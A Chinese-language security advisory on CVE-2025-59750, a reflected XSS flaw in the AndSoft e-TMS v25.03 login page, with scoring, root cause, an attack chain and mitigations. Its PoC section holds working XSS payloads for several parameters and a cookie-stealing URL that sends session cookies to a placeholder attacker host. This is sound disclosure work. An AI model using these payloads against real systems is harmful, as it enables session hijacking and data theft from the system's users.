CVE-2025-59750：AndSoft e-TMS 反射型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-59750

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59750 是 AndSoft 公司推出的 e-TMS（Electronic Transport Management System，电子运输管理系统）v25.03 版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并报告，于2025年10月2日正式公开披露。

e-TMS 是一款广泛应用于物流和运输行业的管理系统，用于处理运输订单、车辆调度、货物跟踪等业务。该系统在企业供应链管理中扮演着重要角色，因此其安全性对业务连续性和数据保护至关重要。

该漏洞存在于 e-TMS 系统的登录页面路径 /clt/LOGINFRM.ASP 中，具体涉及多个 URL 参数，包括 'l'、'demo'、'demo2'、'TNTLOGIN'、'UO' 和 'SuppConn'。这些参数在接收用户输入后未经过充分的过滤和转义处理，直接将用户可控的数据输出到 HTML 页面中，导致攻击者可以通过构造恶意 URL 来注入并执行任意 JavaScript 代码。

根据 CVSS 3.1 评分标准，该漏洞评分为 6.1 分，属于中危级别。攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N），但需要用户交互（UI:R）。漏洞的影响范围已发生变化（S:C），对机密性（C:L）和完整性（I:L）存在低影响，但不影响可用性（A:N）。这意味着攻击者可以利用该漏洞窃取用户会话、劫持浏览器行为或进行钓鱼攻击，但不会直接导致系统宕机或数据大规模泄露。

技术细节

该漏洞是一个典型的反射型 XSS 漏洞，其根本原因在于 e-TMS v25.03 的登录页面 /clt/LOGINFRM.ASP 对用户输入参数缺乏充分的验证和输出编码。

技术原理：
1. e-TMS 系统的 LOGINFRM.ASP 页面接受多个 GET/POST 参数，包括 'l'、'demo'、'demo2'、'TNTLOGIN'、'UO' 和 'SuppConn'。这些参数原本用于控制登录页面的显示行为或传递登录上下文信息。
2. 服务器端在处理这些参数时，未对其进行 HTML 实体编码或严格的输入过滤，直接将参数值嵌入到返回的 HTML 响应中。
3. 攻击者可以构造包含恶意 JavaScript 代码的特殊 URL，例如在参数值中注入 <script>alert('XSS')</script> 或更复杂的 payload（如 document.cookie 窃取代码）。
4. 当受害者点击该恶意链接时，恶意脚本将在受害者的浏览器上下文中执行，由于脚本运行在 e-TMS 域下，因此可以访问该域的会话 Cookie、DOM 内容等敏感信息。

利用方式：
攻击者需要通过社会工程学手段（如钓鱼邮件、即时消息等）诱导受害者点击精心构造的恶意链接。由于漏洞需要用户交互（UI:R），自动化利用的难度相对较高，但结合钓鱼攻击的成功率依然不可忽视。

利用 PoC 示例（针对 'l' 参数）：
https://target-server/clt/LOGINFRM.ASP?l=<script>alert(document.cookie)</script>

该漏洞的危害包括但不限于：会话劫持、敏感信息窃取、钓鱼攻击、恶意软件分发以及结合其他漏洞进行进一步的攻击渗透。

攻击链分析

STEP 1

步骤1：信息收集与目标确认

攻击者首先识别目标组织是否使用 AndSoft e-TMS v25.03 系统，通过网络侦察（如搜索引擎、Shodan 等）定位暴露在互联网上的 e-TMS 登录页面 /clt/LOGINFRM.ASP。

STEP 2

步骤2：构造恶意 URL

攻击者针对 'l'、'demo'、'demo2'、'TNTLOGIN'、'UO' 或 'SuppConn' 等参数构造包含恶意 JavaScript 代码的 URL，代码可能用于窃取会话 Cookie、重定向到钓鱼页面或执行其他恶意操作。

STEP 3

步骤3：投递恶意链接

攻击者通过社会工程学手段（如钓鱼邮件、即时消息、社交媒体等）将恶意链接发送给 e-TMS 系统的合法用户，诱导其点击。

STEP 4

步骤4：触发 XSS 攻击

受害者点击恶意链接后，浏览器向 e-TMS 服务器发送请求，服务器将未经转义的用户输入直接返回到响应页面中，导致恶意 JavaScript 代码在受害者浏览器中执行。

STEP 5

步骤5：数据窃取与权限滥用

恶意脚本在 e-TMS 域上下文中执行，攻击者可以窃取受害者的会话 Cookie、访问敏感数据、执行未授权操作，或利用窃取的会话进行进一步的攻击。

STEP 6

步骤6：持久化与横向移动

在获取有效会话后，攻击者可能在系统中植入后门、修改配置或利用其他漏洞进行横向移动，扩大攻击范围。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59750 - AndSoft e-TMS Reflected XSS PoC -->
<!-- Affected parameter: l, demo, demo2, TNTLOGIN, UO, SuppConn -->
<!-- Affected endpoint: /clt/LOGINFRM.ASP -->

<!-- Basic PoC: Inject JavaScript via 'l' parameter -->
<!-- URL: https://victim-server/clt/LOGINFRM.ASP?l=<script>alert('XSS')</script> -->

<!-- Cookie stealing PoC (for demonstration purposes only) -->
<!-- URL: https://victim-server/clt/LOGINFRM.ASP?l=<script>document.location='https://attacker-server/steal?c='+document.cookie</script> -->

<!-- HTML test page to demonstrate the vulnerability -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-59750 PoC</title>
</head>
<body>
    <h1>CVE-2025-59750 - AndSoft e-TMS Reflected XSS</h1>
    <p>Click the link below to trigger the XSS vulnerability:</p>
    <a href="https://victim-server/clt/LOGINFRM.ASP?l=<script>alert('XSS-CVE-2025-59750')</script>">Trigger XSS via 'l' parameter</a>
    <br>
    <a href="https://victim-server/clt/LOGINFRM.ASP?demo=<script>alert('XSS-demo')</script>">Trigger XSS via 'demo' parameter</a>
    <br>
    <a href="https://victim-server/clt/LOGINFRM.ASP?TNTLOGIN=<script>alert('XSS-TNTLOGIN')</script>">Trigger XSS via 'TNTLOGIN' parameter</a>
    <br>
    <a href="https://victim-server/clt/LOGINFRM.ASP?UO=<img src=x onerror=alert('XSS-UO')>">Trigger XSS via 'UO' parameter (img tag)</a>
    <br>
    <a href="https://victim-server/clt/LOGINFRM.ASP?SuppConn=<svg onload=alert('XSS-SuppConn')>">Trigger XSS via 'SuppConn' parameter (svg tag)</a>
</body>
</html>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在等待官方补丁发布期间，建议采取以下临时缓解措施：1）通过 Web 应用防火墙（WAF）部署 XSS 防护规则，拦截包含常见 XSS payload 的请求；2）实施 Content Security Policy（CSP），限制页面脚本执行；3）为所有会话 Cookie 设置 HttpOnly 标志，降低 Cookie 被窃取的风险；4）对用户进行安全培训，警惕可疑链接；5）监控异常的登录行为和会话活动，及时发现潜在的攻击。